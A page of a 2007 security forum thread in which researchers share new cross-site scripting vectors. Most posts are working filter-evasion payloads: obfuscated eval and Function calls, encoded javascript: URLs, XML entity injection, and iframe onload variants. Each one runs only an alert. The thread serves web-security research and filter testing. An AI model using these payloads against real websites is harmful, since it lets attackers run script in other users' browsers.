Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: 1234567891011...LastNext
Current Page: 1 of 16
New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: September 11, 2007 03:39PM

I've created this thread to store new XSS techniques, I'll start it off with a quoteless string without using fromCharCode:-


alert( String(/Test/).substr(1,4) );

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/28/2008 07:48AM by Gareth Heyes.

Options: ReplyQuote
Re: New XSS vectors
Posted by: rsnake
Date: September 11, 2007 05:24PM

That can actually be shortened to:

SCRIPT>alert(/XSS/.source)</SCRIPT>

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 11, 2007 05:42PM

Nice!

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 12, 2007 09:38AM

Using DOM nodes without calling document.DOMFUNCTION

<p><a onclick="i=createElement('iframe');i.src='javascript:alert(/XSS/)';x=parentNode;x.appendChild(i);" href="#">Test</a></p>

Options: ReplyQuote
Re: New XSS vectors
Posted by: DoctorDan
Date: September 12, 2007 02:32PM

<!-- -- -- -- --<script>alert('XSS')</script> -- -->

It doesn't play nicely with tags around it, as it's a malformed comment. It works in FF and may bypass some obscure filter.

IE is known to loop code in the style expression() vector. Here's a fix...
<div style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCode(88,83,83));'))">

-Dan

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 12, 2007 05:53PM

Dan cool stuff :)

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 13, 2007 02:17AM

IE only:-
URL='javascript:alert(/XSS/)'

e.g. <a onclick="URL='javascript:alert(/XSS/)'" href="#">Test</a>

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 16, 2007 07:44PM

123[''+<_>ev</_>+<_>al</_>](''+<_>aler</_>+<_>t</_>+<_>(1)</_>);

Options: ReplyQuote
Re: New XSS vectors
Posted by: thornmaker
Date: September 16, 2007 11:13PM

that's very clever one Gareth!

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 17, 2007 08:53AM

More XML stuff:-
a=<r><s>eva</s><s>l</s><a>ale</a><a>rt</a><a>(1)</a></r>
0[a.s.text()](a.a.text()+'')

Options: ReplyQuote
Re: New XSS vectors
Posted by: thornmaker
Date: September 17, 2007 01:41PM

you could probably use xpath as well to extract the text, though it probably won't look as cool as just a.s.text(). anyhow, mozilla.org has a good writeup... see http://developer.mozilla.org/en/docs/Introduction_to_using_XPath_in_JavaScript

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 17, 2007 03:13PM

Cool might do a xpath example, if I get chance

Thanks

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 18, 2007 03:49AM

Awesome injection:-
x='\x61\x6c\x65\x72\x74\x28\x31\x29';
new Function(x)()

// By Me & .Mario

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 18, 2007 04:15AM

eval('alert(1)'):-

0['\x65\x76\x61\x6c']('\x61\x6c\x65\x72\x74\x28\x31\x29');



Edited 1 time(s). Last edit at 09/18/2007 04:15AM by Gareth Heyes.

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 18, 2007 05:25AM

Function('a\x6cert(1)')();

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 18, 2007 07:14AM

Eval + Unicode attack :-

x=eval,1,1,1;1;
1,1,1,b='\\',1,1,1;
1,1,1,s='\'',1,1,1;
1,1,1,o='0',1,1,1;
x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) );

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 19, 2007 08:06PM

<p>
<a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41">Test</a>
</p>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors
Posted by: Greg
Date: September 26, 2007 01:31PM

Hi!

I really like this one because as it uses very few different characters (it doesn't need parenthesis!) :

ev setter=eval,dec setter=unescape,location.ss setter=String.prototype.substring,ev=dec=location.ss=21

the actual code is provided in the hash part of the URL like : hxxp://test.com/test#alert(%22XSS%22)

It doesn't work in IE though :-(



Edited 1 time(s). Last edit at 09/26/2007 01:33PM by Greg.

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 26, 2007 01:35PM

Nice stuff Greg!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors
Posted by: thornmaker
Date: September 28, 2007 02:41AM

"><script>eval(location.hash)</script> //where the url hash is: #0={};<<payload>>

note the missing .substr(1)

http://p42.us/#0=%7b%7d%3b

[edit]: Firefox only



Edited 1 time(s). Last edit at 09/28/2007 02:51AM by thornmaker.

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 28, 2007 03:34AM

Cool stuff thornmaker!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: September 30, 2007 04:08PM

You can use square brackets to call string functions (or others) like this:-
s = ! isNaN(1) ? 'javascriptz:zalertz(1)z' [/replace/ [ 'source' ] ](/z/g, [] ) : 0

Even break it up on new lines:-
s = ! isNaN(1) ? 'javascriptz:zalertz(1)z' [/replace/ [ 'source' ]
](/z/g, []
) : 0

Notice dots aren't required

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors
Posted by: Anonymous User
Date: October 05, 2007 04:48AM

Another one abusing unicode characters - respective their index in the unicode table:

$ =
[ '&#24940;' ['charCodeAt'] //
(0)
,'&#25970;' ['charCodeAt'] //
(0)
,'&#29736;' ['charCodeAt'] //
(0)
,'&#8824;' ['charCodeAt'] //
(0)
,'&#29555;' ['charCodeAt'] //
(0)
,'&#8745;' ['charCodeAt'] //
(0)
]
new //
Function //
(
decodeURI //
( //
( //
$[0] //
['toString'] //
(16) + 
$[1] //
['toString'] //
(16) +
$[2] //
['toString'] //
(16) +
$[3] //
['toString'] //
(16) +
$[4] //
['toString'] //
(16) +
$[5] //
['toString'] //
(16)
) 
['replace'] 
(/(\w{2})/g, 
'%$1')
) //
) //
( //
) //

This one won't run in the console and the forum displays the unicode chars as entities, so here's a link:
http://www.php-ids.org/files/vector.html

Options: ReplyQuote
Re: New XSS vectors
Posted by: jmanico
Date: October 11, 2007 06:37AM

Lucking HTML entitly encoding protects against all of this! :)

http://www.owasp.org/index.php/How_to_perform_HTML_entity_encoding_in_Java



Edited 1 time(s). Last edit at 10/11/2007 06:38AM by jmanico.

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: October 11, 2007 06:55AM

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html [
<!ENTITY inject "&#60;script&#62;alert(1)&#60;/script&#62;">
]>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Test</title>
</head>

<body>
&inject;
</body>
</html>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors
Posted by: kuza55
Date: October 11, 2007 07:59AM

@Gareth:
Does the doctype/entity declaration have to occur before the opening html tag?

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: October 11, 2007 08:13AM

I've not looked into it a lot but it seems like it, you can call external dtd's which in turn can link to entities. I'd try things like include multiple HTML documents etc, also it seems the entity encodings only work for XML files although other things may be possible, I will post future research

XML POC here:-
http://www.businessinfo.co.uk/labs/xml_injection/inject.xml

Another neat thing with this is that you can redefine existing HTML entities so &nsbp; becomes <script>alert(1)</script> hehe

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 10/11/2007 09:11AM by Gareth Heyes.

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: October 11, 2007 10:34AM

Right I had a bit of spare time to investigate a little and I've found the following:-

1. It can only be called using XML.
2. External DTD's entities are not parsed by Firefox.
3. The entities have to be included within the document type definition.
4. HTML cannot be extended with entities etc.

Still more scope for experimentation but I hope that clears up a few things for everyone.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: October 17, 2007 05:21AM

I did a bit of targeted fuzzing on a iframe for fun, here are the results:-

<iframe/ /onload=alert(/XSS/)></iframe>
<iframe/ "onload=alert(/XSS/)></iframe>
<iframe///////onload=alert(/XSS/)></iframe>
<iframe "onload=alert(/XSS/)></iframe>
<iframe<?php echo chr(11)?> onload=alert(/XSS/)></iframe>
<iframe<?php echo chr(12)?> onload=alert(/XSS/)></iframe>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors
Posted by: Anonymous User
Date: October 17, 2007 07:50AM

<iframe/what ever you like in here!!!

even line breaks

/onload=alert(/xss/)></iframe>

Confirmed on FF 2.0.0.7 and IE7

Options: ReplyQuote
Pages: 1234567891011...LastNext
Current Page: 1 of 16


Sorry, you can't reply to this topic. It has been closed.